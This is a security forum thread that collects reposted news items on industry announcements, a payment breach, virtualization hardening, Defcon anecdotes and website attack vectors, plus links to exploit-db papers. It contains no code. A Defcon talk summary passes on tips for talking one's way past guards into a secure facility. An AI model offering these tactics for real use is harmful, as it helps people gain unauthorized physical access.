DarkyAngel

Mandiant Launches Research Division In an announcement timed to coincide with the Black Hat conference last week in Las Vegas, Mandiant, a provider of security threat detection and response solutions, said that it has formed a new research division dubbed “Mandiant Labs” (M-Labs™). The Alexandria, Virginia-based company said its new research initiative combines its reverse engineers, malware analysts and researchers onto a single team in an effort to drive innovation and automation across the company to support Mandiant’s products and services. “At Mandiant, we recognize that innovation is the key to staying one step ahead of the adversary,” said Travis Reese, Mandiant president and chief operating officer. “Mandiant has already revolutionized how organizations detect, respond to, and contain targeted attacks. M-Labs concentrate many of the industry’s top security experts in a single organization.” M-Labs™ will be headed up by Jamie Butler, chief researcher and co-author of the book,"Rootkits: Subverting the Windows Kernel,” and Greg Jones, Director of Mandiant Labs. According to the company, the M-Labs team will focus its efforts in two specific areas: Intelligence Gathering and Analysis – Works with Mandiant’s consulting organization to collect, triage and analyze intelligence gathered from Mandiant’s ongoing operations that track advanced attack groups, including new malware samples and other tools, techniques and protocols of advanced attack groups. Advanced Analytics & Service Delivery Automation – The M-Labs team work to develop new and new and faster ways to process the intelligence collected from the more than one million endpoints it monitors for clients, along with the hundreds of thousands of hours its consultants spend investigating security intrusions. “Time counts when responding to advanced attackers,” said Jamie Butler, Mandiant’s chief researcher and the leader of the M-Labs team. “The work of the M-Labs team will help our clients know where the attackers are, how they are behaving and help anticipate their next moves.” Sursa

Thomson Reuters to Acquire Online Brand Protector MarkMonitor Business news and information giant Thomson Reuters announced on Thursday that it would acquire MarkMonitor, a provider of online brand protection services. San Francisco, California-based MarkMonitor helps companies protect their brands online, offering services such as tracking down counterfeit goods being sold online, trademark infringements, “brandjacking”, and is even a domain name registrar and protector to some of the largest online companies such as Apple and Google. The acquisition will put MarkMonitor under Thomson Reuters’ Intellectual Property & Science business, adding to its portfolio of intellectual property solutions. The addition of MarkMonitor, the company says, will result in a suite of efficient and effective end-to-end brand protection solutions to assist customers in securing revenue and reputation. “Thomson Reuters already helps thousands of companies create, manage and protect hundreds of billions of dollars worth of intellectual property assets,” said David Brown, president, Intellectual Property Solutions, Thomson Reuters. “With the addition of online brand protection solutions like those provided by MarkMonitor, we’ll be able to deliver advanced technologies to keep customers one step ahead of brandjackers and reduce the enormous risk posed to brands online.” “With the continued explosive growth of Internet, ecommerce and social network usage, the digital world provides an anonymous haven for criminals who harm brands’ revenue and reputation, often at the expense of consumers,” said Salim. “Brands that take action to protect themselves by managing their domain name portfolios see real return on investment, including lower online advertising costs and higher revenue, along with greater customer satisfaction.” MarkMonitor has over 400 employees in five countries and counts more than half of the Fortune 100 brands as customers. MarkMonitor employees, and President and Chief Executive Officer Irfan Salim, will join Thomson Reuters. The acquisition is subject to standard regulatory approvals, and terms of the transaction were not disclosed. Sursa

Global Payments: Data Breach Cost Nearly $85 Million Global Payments, Inc., the payment processing firm that disclosed a data breach back in late March, which the company ultimately said could have exposed up to 1.5 million card numbers, has shared details on the total cost of the incident so far. According to a July 26 statement issued by the company, one of the world’s largest electronic transaction processing providers, the cost of the security incident is pegged at $84.4 million. “With the completion of our data intrusion investigation, GAAP results for the fourth quarter and full-year 2012 include a pre-tax charge of $84.4 million or $0.68 diluted earnings per share,” the statement read. “This charge includes an estimate of charges from the card brands and investigation and remediation expenses.” As a result of the breach, the company was removed from multiple card brands including Visa and MasterCard’s list of approved service vendors, something the company is looking to fix. “A qualified security assessor is conducting the independent review required to return the company to the lists of PCI compliant service providers,” the company said. The company has maintained its claims that only Track 2 card data may have been stolen, and that cardholder names, addresses and social security numbers were not obtained by the criminals. Sursa

Virtualization brings significant value to business managers and engineers attempting to keep pace with business pressure for additional servers. It enables maximum use of hardware resources while introducing an increased flexibility in how organizations design and implement new solutions. However, it also introduces new security concerns. Until recently, organizations had to leverage security controls not specifically designed to protect virtual environments. However, upgrades to VMware and Microsoft virtualization solutions provide better monitoring and segregation of critical virtual systems. In this chapter, I address general concerns related to virtualization security. I focus on what questions you should ask during a risk assessment of a virtualized environment, using Microsoft and VMware virtualization solutions as examples to demonstrate concepts. The Basics Before we begin, let’s be sure we understand server virtualization technology as discussed in this chapter. Figure 10-1 depicts a high-level view of a VMware environment. Virtualizing servers allows various guest operating systems to run on a single hardware platform. The administrator can manage them from a single local or Web-connected computer. Figure 10-1: VMware Configuration (VMware, n.d.) Figure 10-2 drills a little deeper, showing the basic configuration of Microsoft Windows Server 2008 R2 virtualization. The Hyper-V layer is the hypervisor. Hypervisors exist in all enterprise class virtualization solutions. They abstract the host server’s hardware from the virtual machines. See Figure 10-3. It’s a very thin layer that Optimizes virtual machine (VM) interrupt calls Manages shared memory Generally enables VM use of system resources without having to access the host operating system, while managing those resources as configured in the management operating system Figure 10-2: Microsoft Server Virtualization Components Host Operating System A virtualized hardware platform requires a foundational operating system (OS) into which system engineers install the virtualization components. In a Windows Server 2008 R2 environment, this requires a 64-bit version of Server Standard, Enterprise, or Datacenter. This is either a standard install or an implementation of Server Core. Figure 10-3: Microsoft Server Virtualization (Microsoft MSDN, 2011) Partitions Partitions are isolated operational entities within a virtualized environment. According to Microsoft MSDN (2011), “A partition is a logical unit of isolation, supported by the hypervisor, in which operating systems execute” (para. 2). A more workable definition describes partitions as the areas in which guest operating systems execute. However, not all partitions are equal. The Root (a.k.a. Parent) partition (RP) is a mandatory instance of Windows Server. The virtualization stack resides here, and administrators use it to create, initiate, stop, and manage VM instances. It also differs from child partitions in its ability to directly access hardware resources (Microsoft MSDN, 2011). Although the RP is important, no production systems run within it. This is the role of child partitions. Child (or guest) partitions (CP) contain production systems and operate just as their hardware peers. The difference is their lack of direct access to resources provided by the underlying hardware platform. Instead, “they have a virtual view of the processor and run in a virtual memory address region that is private to each guest partition” (Microsoft MSDN, 2011, para. 4). The RP and the hypervisor enable use of internal and external resources, including connectivity to a physical network. I could dig deeper into the various services and interfaces enabling Microsoft Virtualization, but this high-level view is sufficient to begin a discussion about hypervisor and VM security. For details about the components depicted in Figure 10-3, see the supplied reference. Manage the Attack Surface The attack surface of a virtualized Microsoft server environment potentially consists of all the components discussed above, including all supporting files and drivers. Its actual size, however, depends on how well we perform the following: Harden the Host Harden the management and VM operating systems Ensure configuration of all user roles with least privilege access Use administrator roles to implement separation of Host, RP, and VM management Secure VM files, including hard disk, backups, and archives Enable auditing Enable log management and monitoring Patch archived VMs Use VLANs and multiple network interface cards (NICs) to isolate management and VM access Use virtual networks to isolate VMs on the same host Manage proliferation Harden the Host The Host consists of the hardware and operating system that underlie the hypervisor, as shown in Figure 10-2. The Host operating system is subject to all vulnerabilities expected in a Microsoft Server implementation, including extra services. The best way to reduce the Host’s attack surface is to eliminate common vulnerabilities. Simply, just don’t install them. A Windows Server Core implementation is the best way to achieve this. Server Core is a minimal installation of Windows Server. According to Microsoft TechNet (2011), the purpose of Server Core is “…to eliminate any services and other features that are not essential for the support of certain commonly used server roles. For example, a Domain Name System (DNS) server really doesn’t need Windows Internet Explorer installed on it because you wouldn’t want to browse the Web from a DNS server for security reasons. And a DNS server doesn’t even need a graphical user interface (GUI), because you can manage virtually all aspects of DNS either from the command line using the powerful Dnscmd.exe command, or remotely using the DNS Microsoft Management Console (MMC) snap-in” (Full vs. Server Core, para. 2). Server Core is not without constraints. Third party drivers and services may not work properly. If this is a problem for you, then implement a full version of Server. Whether you use Core or a full implementation, use common sense and best practices to secure your Host. For more information on Server hardening practices, see Microsoft’s Server 2008 R2 Security Baseline and the SANS guide to VMware virtualization hardening guides ([Green] http://www.sans.org/reading_room/analysts_program/vmware-guide-may-2010.pdf). Harden the Management and VM Operating Systems You must also harden the management operating system (MOS) running in the RP. The MOS is another instance of Windows Server. It is used by administrators to manage the overall virtualization environment. When deciding how much security is necessary, make sure MOS hardening is commensurate with the most sensitive information processed on any of the VMs on the MOS’s Host. In addition to the management operating system, each VM OS requires the same attention. Use the appropriate security recommendations for the virtual server OS and the server role. Treat each VM as you would a physical server; the same security policies apply. Consider an important caveat when installing and configuring anti-virus software. Avoid scanning virtual machine and virtual machine management files. Failure to exclude these files from your AV scanning process might result in VM instantiation issues. Finally, the management server is not a production server. Never run business applications there or use it to browse the Internet. Use it strictly as a tool to manage VMs. Restrict applications and browsing to virtual production servers. Configure Admin Roles To ensure separation of duties for security and compliance purposes, no one person should have the ability to perform all administrative tasks. For example, a hypervisor administrator should not have permission to manage VMs. Microsoft provides three pre-defined roles to help separate critical duties: Hyper-V administrator – Using the (MOS) in the RP, this role has permissions to make global changes affecting all VMs on a Host, including network and storage configurations. Delegated administrator – This role provides additional granularity for administrator access by restricting administrators to those Hosts or Host groups they must manage. Using Microsoft’s System Center Virtual Machine Manager (VMM), they can manage VMs on any hosts to which they’ve been assigned, but they have no access to other Hosts in the enterprise. Self-service user – The overall administrator can set access controls by VM or by sets of VMs using this role. This differs from the delegated administrator role by allowing privilege assignment at the VM level instead of limited control to the Host level. In addition, consider separating physical security administration from hypervisor administration. In other words, because an engineer has to maintain the Host hardware and OS does not mean he or she needs access to the VM management server application. By default, Microsoft MOS local administrators have access to MOS management via the Hyper-V Manager Microsoft Management Console (MMC) snap-in. Further, using the Authorization Manager MMC snap-in provides granular control of administrative tasks. Microsoft (2009) provides lists of operations (see the following tables) you might consider when segregating management responsibility with your own roles (p.21). Table 1: Hyper-V Service Operations [table=width: 500, class: grid, align: center] [tr] [td]Name[/td] [td]Description[/td] [/tr] [tr] [td]Read service configuration[/td] [td]Authorizes reading configuration of the Virtual Machine Management Service[/td] [/tr] [tr] [td]Reconfigure Service[/td] [td]Authorizes reconfiguration of Virtual Machine Management Service[/td] [/tr] [/table] Table 2: Hyper-V Network Operations [table=width: 500, class: grid, align: center] [tr] [td]Name[/td] [td]Description[/td] [/tr] [tr] [td]Bind External Ethernet Port[/td] [td]Authorizes binding to an external Ethernet port[/td] [/tr] [tr] [td]Connect Virtual Switch Port[/td] [td]Authorizes connecting to a virtual switch port[/td] [/tr] [tr] [td]Create Internal Ethernet Port[/td] [td]Authorizes creating an internal Ethernet port[/td] [/tr] [tr] [td]Create Virtual Switch[/td] [td]Authorizes creating a new virtual switch[/td] [/tr] [tr] [td]Create Virtual Switch Port[/td] [td]Authorizes creating a new virtual switch port[/td] [/tr] [tr] [td]Delete Internal Ethernet Port[/td] [td]Authorizes deleting an internal Ethernet port[/td] [/tr] [tr] [td]Delete Virtual Switch[/td] [td]Authorizes deleting a virtual switch[/td] [/tr] [tr] [td]Delete Virtual Switch Port[/td] [td]Authorizes deleting a virtual switch port[/td] [/tr] [tr] [td]Disconnect Virtual Switch Port[/td] [td]Authorizes disconnecting from a virtual switch port[/td] [/tr] [tr] [td]Modify Internal Ethernet Port[/td] [td]Authorizes modifying the internal Ethernet port settings[/td] [/tr] [tr] [td]Modify Switch Port Settings[/td] [td]Authorizes modifying the switch port settings[/td] [/tr] [tr] [td]Modify Switch Settings[/td] [td]Authorizes modifying the switch settings[/td] [/tr] [tr] [td]Change VLAN Configuration on Port[/td] [td]Authorizes modifying VLAN settings[/td] [/tr] [tr] [td]Unbind External Ethernet Port[/td] [td]Authorizes unbinding from an external Ethernet port[/td] [/tr] [tr] [td]View External Ethernet Ports[/td] [td]Authorizes viewing the available external Ethernet ports[/td] [/tr] [tr] [td]View Internal Ethernet Ports[/td] [td]Authorizes viewing the available internal Ethernet ports[/td] [/tr] [tr] [td]View LAN Endpoints[/td] [td]Authorizes viewing the LAN endpoints[/td] [/tr] [tr] [td]View Switch Ports[/td] [td]Authorizes viewing the available switch ports[/td] [/tr] [tr] [td]View Switches[/td] [td]Authorizes viewing the available switches[/td] [/tr] [tr] [td]View Virtual Switch Management Service[/td] [td]Authorizes viewing the Virtual Switch Management Service[/td] [/tr] [tr] [td]View VLAN Settings[/td] [td]Authorizes viewing the VLAN settings[/td] [/tr] [/table] Table 3: Hyper-V Virtual Machine Operations [table=width: 500, class: grid, align: center] [tr] [td]Name[/td] [td]Description[/td] [/tr] [tr] [td]Allow Input to Virtual Machine[/td] [td]Authorizes user to give input to the virtual machine[/td] [/tr] [tr] [td]Allow Output from Virtual Machine[/td] [td]Authorizes viewing the output from a virtual machine[/td] [/tr] [tr] [td]Change Virtual Machine Authorization Scope[/td] [td]Authorizes changing the scope of a virtual machine[/td] [/tr] [tr] [td]Create Virtual Machine[/td] [td]Authorizes creating a virtual machine[/td] [/tr] [tr] [td]Delete Virtual Machine[/td] [td]Authorizes deleting a virtual machine[/td] [/tr] [tr] [td]Pause and Restart Virtual Machine[/td] [td]Authorizes pause and restart of a virtual machine[/td] [/tr] [tr] [td]Reconfigure Virtual Machine[/td] [td]Authorizes reconfiguring a virtual machine[/td] [/tr] [tr] [td]Start Virtual Machine[/td] [td]Authorizes starting the virtual machine[/td] [/tr] [tr] [td]Stop Virtual Machine[/td] [td]Authorizes stopping the virtual machine[/td] [/tr] [tr] [td]View Virtual Machine Configuration[/td] [td]Authorizes viewing the virtual machine configuration[/td] [/tr] [/table] Secure VM files By default, Microsoft VM files are located in two folders: %programdata%\Microsoft\Windows\Hyper-V\ %users%\Public\Documents\Hyper-V\Virtual Hard Disks VMware stores VM files, by default, in the directory /var/lib/vmware/Virtual Machines. Regardless of where you store your VM files, consider protecting them with the following controls: Use network segments and access control lists to enforce least privilege for services and administrators. Block all other access. Encrypt the folders/directories listed above or the volume containing them. Ensure you have a current backup. Enable auditing. When applying access controls, remember that a VM administrator might not need access to all VMs. For each virtual server administrator, allow access only to files for VMs he or she manages. Enable Auditing Auditing includes both file access and system monitoring. Windows TechNet (2009) provides audit policy implementation instructions. All files associated with Microsoft VM and RP configuration and data storage are candidates for auditing. In addition to file access auditing, use Microsoft System Center Operations Manager, or similar monitoring tool, to alert on unwanted or high-risk behavior. Enable Monitoring and Log Management Most (hopefully all) security practitioners understand the importance of monitoring and logging network and device activity. Solutions exist in many data centers to centralize, correlate, and manage events. However, traditional solutions (pre-virtualization) cannot see what is happening in, around, and between VMs on the same hardware platform. The ability to see inside the virtual space with firewalls, IPS, IDS, and log management systems is called introspection. Today’s hypervisors usually ship with excellent logging capabilities. The Syslog Collector in VMware vSphere 5 ([Green] http://blogs.vmware.com/esxi/2011/07/setting-up-the-esxi-syslog-collector.html) is a good example of a solution that aggregates VM logs for storage on any server you choose. Regardless of how you collect your logs, they should make their way to your SIEM application. Packets must pass through an IPS so anomalous traffic is blocked. IPS solutions for virtual spaces are emerging, but many organizations are not prepared to configure additional devices, virtual or not. Figure 10-4 shows an optional configuration. All traffic between VMs must pass through a traditional IPS appliance before reaching its target. One downside to this approach is propagation delay. However, the delay is usually presents less risk than lack of introspection. Figure 10-4: Routing VM Traffic through External Device (Olzak, 2011) Patch Archived VMs Physical and virtual servers require the same administrative, logical, and physical controls: including participation in an aggressive patching process. Patching running VMs is straightforward. They look like any other server to your patching application. But what about VMs not currently running? It is never a good idea to add an unpatched server to a production environment. However, if you’ve archived a VM for several months, it might lack critical security patches. Microsoft TechNet has a solution for this. Using Microsoft’s Virtual Machine Servicing Tool (VMST) 3.0, you can apply updates and patches to any archived VM. Use of this tool requires one of the following: System Center Virtual Machine Manager 2008 R2 System Center Configuration Manager 2007 SP2 Windows Server Update Services 3.0 SP2 Figure 10-5 depicts the patching/update process. Each archived VM is started, updated, and then stored and deactivated. Note the requirement for a maintenance host. Place this server in a restricted network segment. Ensure its security is commensurate with the highest classification of data in your enterprise. Figure 10-5: Virtual Machine Servicing Tool Process (Microsoft TechNet, 2010, Servicing Offline Virtual Machines in a VMM Library) If auto-patching of suspended VMs is not an option, create a procedure to include their files in your patch application activities. Use hardware completely isolated (logically or physically) from the production network, and launch, patch, and suspend all affected VMs. Isolate VMs and the RP Isolating devices in a virtual environment follows the principle of network segmentation. Segmenting a network allows only explicitly permitted network traffic to reach a device. In a virtualized environment, there are two possible segmentation methods: physical and virtual. Physical Segmentation The final step in configuring a Host is connecting it and its VMs to the network. However, not all network connections are the same. Network segmentation is necessary to ensure only authorized traffic arrives at the most sensitive areas. This requires at least two network interface cards (NICs) installed in the Host. In addition, consider only placing VMs with the same required trust levels on any given hardware platform. At the most basic level, access to the management server on each hardware platform should be over a dedicated management segment connected to one of the NICs. Using physical VLANs, this is simple and provides the first layer of security against unauthorized access to the hypervisor configuration. One or more additional VLANs are then necessary to connect the VMs via the remaining NICs. Figure 10-6 shows the Microsoft physical NIC assignment window. When configuring the Hyper-V server role, you are asked to assign a NIC to the VMs or to the MOS. An unchecked NIC is automatically assigned to the MOS. Figure 10-6: NIC Assignment Virtual Segmentation A virtual switch is created for each of the NICs you select in the process above, as shown in Figure 10-7. You can also configure your own. According to Panek (2009), “Virtual switches help Hyper-V secure and control the network packets that enter and exit the virtual machines. You can limit the communications to or from a virtual machine and the VLAN. When setting up your network adapters, you can associate a single virtual switch with that adapter” (p. 98). The Hyper-V administrator creates one or more virtual NICs for each VM and connects them to virtual switch ports. Virtual switches function like physical switches, including allowing creation of VLANs to control traffic flow. Three types of virtual networks (VNs) are possible in a Microsoft Windows Server virtualization implementation: internal, external, and private. Internal virtual networks have no access to the outside world. They allow VMs to communicate with each other and the RP. An Internal VN is not bound to a physical NIC and is typically used for testing. External VNs allow VMs, and the MOS, to communicate over the physical network and with the physical server. Private VNs provide granular virtual network segmentation, allowing administrators to control traffic between VMs on the same Host. It isn’t always necessary for VMs on a single Host to access each other. In these cases, isolate them. Figure 10-7: Virtual Switches Figure 10-8 depicts a VLAN configuration using virtual switches in Windows Server 2012 to manage access across multiple VMs on the same hardware platform. Whether using virtual or physical switches, VLAN segmentation as described in Chapter 5 is a crucial part of attack surface reduction and isolation of servers sharing hardware resources. Figure 10-8: Windows Server 2012 Virtual Switches (Microsoft, 2012, p. 10) Manage Proliferation Virtualization is a great productivity tool… if not abused. However, there is temptation to use it for quickly instantiating servers outside established change management processes. When this happens, all oversight to ensure attack surface mitigation is by-passed. Over time, out-of-control virtualization can become a bigger risk than a benefit. Keeping risk low is not difficult. Ensure any server showing up on your network is quickly identified and its authorization confirmed. Create policies that include ensuring all virtual server implementations follow a strict change management process. Finally, work with your engineers to get their buy-in. Proliferation risk is manageable with the right procedures controls, and attitudes in place. Conclusion Virtualization is a significant addition to business productivity tools. It provides flexibility, resiliency, and quick IT reaction times when business needs arise. In many ways, the same security policies apply to VMs and physical servers, but there are a few differences. Segregate administrative roles and control access to VM files based on least privilege. This might be difficult for small IT shops, but make every effort to ensure physical server, management operating system, and VM administration are not performed by the same person. Include archived VMs in your patching process. Treat them like running servers. Keeping them patched prevents surprises when you start them after a few months and without critical security patches. Use physical and virtual network segmentation to restrict traffic and access. This includes using virtual switches to segregate VMs on the same Host. Finally, control VM proliferation. Integrate VM creation, start up, and shut down activities into your change management and network monitoring processes. Sursa

Freak incident leads to cell phone battery lighting a real fire under a man's backside. Hotel room key-card saves him. LAS VEGAS -- A cell phone battery spontaneously caught fire today, burned through a Defcon attendee's back pants pocket, and fell on the floor, creating burn spots on a carpet and leaving a burn-hole in the attendee's chair. The man, who asked not to be identified, was not harmed but his trousers were ruined. He told CNET that he was sitting in a session at Defcon around 11:30 a.m. PT when he started to smell something burning and felt some heat underneath him on his seat. He stood up to find that his back left pocket was on fire. "I smelled the burn, the smoke, and I stood up and could literally see flames," he said. "I tried to tap it out (with a hand) and it fell to the floor. It burned right through the backside." The battery, which he said goes with a Droid Bionic smartphone that was not in the pocket, was still burning on the ground. He kicked it and it rolled and burned another spot into the carpet. He then left the room to get help as people around him began taking photos. His derriere probably would have been scorched as well if he hadn't had his plastic hotel room key-card in between him and the battery. "My hotel key saved my butt," he said, laughing. A woman who was taking video of the event for Defcon was seated on a platform about 20 feet away and had a good view of what happened. "I saw something glowing out of the corner of my eye," she said. "A guy's butt was in flames." The rest of the session was canceled and the room was evacuated. The man said he had nothing else in his pocket but the battery and the hotel card key, and that he had no idea why the battery would have started to heat up. CNET did not see the phone and was unable to confirm its make and model. A Motorola representative provided this statement when asked for comment: "Motorola Mobility's priority is the safety of our customers. All Motorola products are designed, manufactured, and tested to meet or exceed international and local standards for consumer safety and performance. We will will look into this matter immediately." The cause of the overheating remains a mystery. Don Bailey, a mobile expert at Capitol Hill Consultants, said batteries can heat up if the metal leads touch something conductive. "Something as simple as steel wool can cause a short between the leads on a cell phone battery," he said. It could been a bad battery, or the man could have damaged the battery somehow. But if there was no metal in the pocket at the time, it's likely the culprit was some conductive material, such as steel wool from a brush used to clean metal, that had somehow worked its way into the fibers of his pocket, Bailey said. "It's rare for manufactured batteries like these to have that kind of a failure." Sursa

It looks real, but the URL is a giveaway that the Web page did not originate from the people of The New York Times. An opinion piece that appears to be by former New York Times editor Bill Keller on what appears to be the New York Times Web site is a fake. The editorial urges Visa, Mastercard, and American Express to take a "stand against the use of financial embargos to prohibit supporters from contributing or subscribing to media organizations protected by the First Amendment and free speech laws." The fake op-ed was drafted as a follow up to a February 2012 op-ed by Keller titled "Wikileaks, A Postscript." The URL for the fake column was a giveaway to what is a near perfect replica of a New York Times page. The prank URL: WikiLeaks, a Post Postscript - NYTimes.com An authentic New York Times URL: http://www.nytimes.com/2012/07/29/opinion/ Keller tweeted that the op-ed did not come from his computer, and confirmed the fake to ATD's Peter Kafka: New York Times technology writer Nick Bilton tweeted the fake Keller editorial to his followers, and after learning of the "hall of mirrors" deleted the tweet. This episode exemplifies the old Internet adage, "On the Internet nobody knows you're a dog," and the ease with which a clever prankster can wreak havoc. So far, no one has claimed responsibility for the prank. Sursa

Venue: Rio Hotel and Casino We reached Rio Hotel at around 8 am. We thought we did good on time until a nice gentleman came to us and said “It’s a 3 hour long line guys !”. We however got through the line in about 90 minutes, thanks to the nice staff at Defcon. One you get through the registration process, you are offered a Defcon badge which is your entry pass to Defcon and a booklet that informs you about the whole Defcon schedule. ntro to Digital Forensics: Tools and Tactics This talk by Ripshy and Jacob was mainly directed at people who wanted to get started with Infosec. Before the talk, the authors quickly distributed some Backtrack Live CD’s to the public. The talk started by an introduction to the Backtrack distro, telling about the little things like the user/pass for logging in to BT and getting started with network services in BT. The author then mentioned the top 5 tools used in Infosec which included Nmap, TCPDump, netcat, Ntop and Metasploit. The author then explained all the 5 top Infosec tools and their basic usage, by giving examples with screenshots, commands etc. Cerebral Source Code This was one of the best talks i have ever been to at Defcon. This talk by Siviak was mainly focussed on Social Engineering. The speaker starts by explaining how simple things like being nice to people can help you get the information you want. The speaker then tells that things like good books and courses for Social Engineering doesn’t exist. To be good at Social engineering, you have to go out and live the experience, and take a chance whenever possible. The key thing is to motivate people to give you the thing that you want. There is no such thing as an effective Social Engineering technique, it changes by time and even by weather. One of the funny incidents happened when someone from the audience asked “What is an effective technique to get traffic on your site by Social Networking ?” and the speaker replied “PORN.” One of the good questions asked were “What is a good Social Engineering technique to gain access to a security facility via Social Engineering ?”. The speaker Siviak replied by telling that we should always look like we know what we are doing, and that we are supposed to be in the place where we are. If some security guy fires a tough question at you, fire them back ! They don’t know how to react to such a situation. Don’t give their brains time to catch up. Humans are like computers, the more information you give them, the more they will be able to figure things out. We must change things quickly so their brains don’t catch up with what’s going on. If you want to perform Social engineering on a specific subject (person) and you don’t know what he/she has under her desk, how many kids he/she have etc, you are not trying hard enough. These things will help you build a common thread which could help you in obtaining more information from the subject. The talk ended with a last question when someone asked “Do we need to learn psychology in order to perform Social Engineering ?” and the speaker replied “No”. Overall the talk was very informative and the speaker was very funny so he kept the audience in a very good mood throughout. DEF CON 101 This panel was taken by Pyro, Roamer, Lockheed, Alxrogan, Lost and FLipper who are responsible for organizing many of the events and maintaining the network at Defcon. The talk was mainly focussed on how you could maximize your Defcon experience. The main point told by the organizers was “You get as much out of Defcon as you put into it.” They talk about how we should just not attend Defcon talks, but meet and socialize with people. We could just go up to some people, but them a beer and you never know, that guy might just turn into your best friend. The defcon organizers tell about how they are looking forward to this weekend for the whole year, and all they want from us is just to listen to the Goons if they have some problem with you. Lockheed then comes up and talk about some of the challenges they face while setting up the Defcon network. The authors then tell us about the Defcon nightlife, some of the events that will be happening in the night, and asks us to attend these events too. The authors conclude by telling us that we should be careful while talking to the media and should ask for the power to edit the article because you never know what they might publish. Screw the Planet, Hack the Job ! This talk by Roamer, Lockheed, Alxrogan who are part of the Defcon staff tells us how utilizing Defcon can help you find your dream job. One of the best parts of this talk was when someone asked “I know there are potential employers/employees at Defcon. Do you plan to have something like a job fair at Defcon ?” and one of the speakers replied “I know what you are talking about, we have people who want to hire at Defcon. But the moment we cross that line and it turns into a job fair, we have lost our credibility.” HF Skiddies SUCK, don’t be one. Learn some basic Python.’ The speaker King TunA starts by speaking about some of the basic advantages of using Python by giving demos via videos (which weren’t possible to see as long as you are very close to the screen but are online on Youtube). The speaker explains how things which can take 200-300 lines of code in other languages could be done in Python in much lesser lines. Finally, the author ends the talk by giving a demo of an HTTP scraper. Here’s a quick video of this year’s Defcon badge. Well there is more to Defcon than just the talks. Its also about the Defco nightlife, meetups etc. There was this very good event called “the Summit” being held which was a fundraiser for the EFF. I went to the hackfest meetup in Flamigo though. Well that’s it for Defcon day 1. I will be writing about Defcon day 2 and day 3 also. Please let me know if there is something specific about Defcon that you want me to write about. I leave you now with some pictures from the event. Original Article

Why do websites get hacked? Websites get hacked for a bunch of different reasons: To plant hidden links to other sites in an attempt to game search engines and raise those site’s rankings To plant spyware on your site that will infect your visitors and take over their computers, to make a botnet To hijack the server itself and use it to attack other systems To send out spam To gain access to credit card info or personal identities For the pure thrill of vandalism Because someone has a grudge against you Because somebody is bored, and you made it easy Many people don’t think it will happen to them. Why would somebody hack your web site? Well, as you can see from the list above, lots of reasons that don’t have anything to do with you. And it happens all the time. We have seen sites hacked for all the reasons above, except for the credit card/personal identity theft. That’s the one that could hurt our customers the most, and so far, small e-tailers have been lucky that there are so many much bigger targets with lax security that this kind of theft is not yet a problem. But it seems inevitable to me that this kind of attack will get much more pervasive as the big targets get harder to compromise. How do they break in? There’s a whole bunch of different ways to break into your web site. Here are ones we’ve seen: FTP password is sniffed at an open wireless point, and the attacker gets full access to upload anything they want to your site. An attacker puts malicious code into a form on your site that attacks the application you’re running (Word Press, Joomla), your visitors (a cross-site scripting attack that installs malware on Windows computers) or you (tricking your browser into doing some administrative task without you knowing about it), or another site (a “cross-site request forgery”, used perhaps to attack a specific banking site and request a wire transfer to a mule). An attacker finds a known vulnerability in the software you’re running, or even a library your custom site happens to have available, and uses it to break into the server (or any of the other attacks we listed). An attacker guesses your password, perhaps by finding it at another site they have already attacked, and logs in as you. Your desktop or laptop gets spyware on it, and sends everything you type back to the botnet owner, including your passwords. The attacker finds a vulnerable service running on the server, and uses that to exploit all the sites it hosts. Another site on the same server gets hacked, and the attacker uploads a script that runs on the server and infects every other site. How does your web host protect you? In most cases, out of the 7 attacks listed above, typical web hosts protect you from one of these: # 6. They do nothing to protect you from any other attack — preventing the rest is entirely up to you. That is how a service with some level protection should look like: We don’t run FTP on any of our servers. All server access is through encrypted connections. We have limited the applications we support to a single platform (Drupal), with constant widespread review of vulnerable forms, and actively apply updates that affect your site. Preventing attacks based on your password getting stolen is not possible. And if your site doesn’t use SSL, your administrative password can be sniffed. But even with your password stolen, we protect your site in two ways: Limited access — generally we start you out with less administrative access until you’ve become comfortable using your site. Not only does this make it easier for you to learn, but it limits the damage that can be done with your account. We’ve got you covered. We have over-the-top backup systems in multiple locations, with historical backups going for up to 16 months. We take nightly snapshots of your database as well as files, and can restore your site to the way it was 3 days ago, or 2 weeks ago, or a variety of other points. And we have experience extracting just certain bits of content from the backup, selectively restoring what you need. [*]We lock down our servers, not even running control panel software or anything not directly needed to support the operation of our customer’s sites. [*]We maintain all of the sites on our servers, not just yours. You can rest assured that there’s not an old Word Press site sharing the server with your site, leaving a wide-open door to infect your site even if you’ve done everything else right. [*]Platform chosen and configured for security. One of the really great features of Drupal is that we can set it up so the web server cannot change the code running the server, because the operating system won’t let it. And we can allow files like images, videos, and documents to specially-controlled section of the server where code cannot be run, where files used for an attack are rendered harmless. When set up like this, it’s much harder for an attacker to upload a malicious file and gain access to the server. We cannot do this without breaking things with platforms like Joomla, Word Press, or ZenCart — which is one of the reasons we no longer support that software. [*]Versioning of the site code. By using version control with cryptographic hashing of all file contents, we can very easily detect if something gets changed, see what those changes are, and very easily undo them. Sursa

Bypassing Spam Filters Using Homographs By Fady Mohamed Osman www. darkmaster. tk @fady_osman Paper Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/20114.pdf

Transferable State Attack on Iterated Hashing Functions July 26, 2012 Brian Wallace Paper Download : http://www.exploit-db.com/wp-content/themes/exploit/docs/20119.pdf

eu nu v? în?eleg.. acu` î?i explic?m s? nu mai pui linkuri de down hashuri, ?î tu tot acolo faci ( link cu md5 )

cine crezi c? st? s?-?i fac? brute la astea?

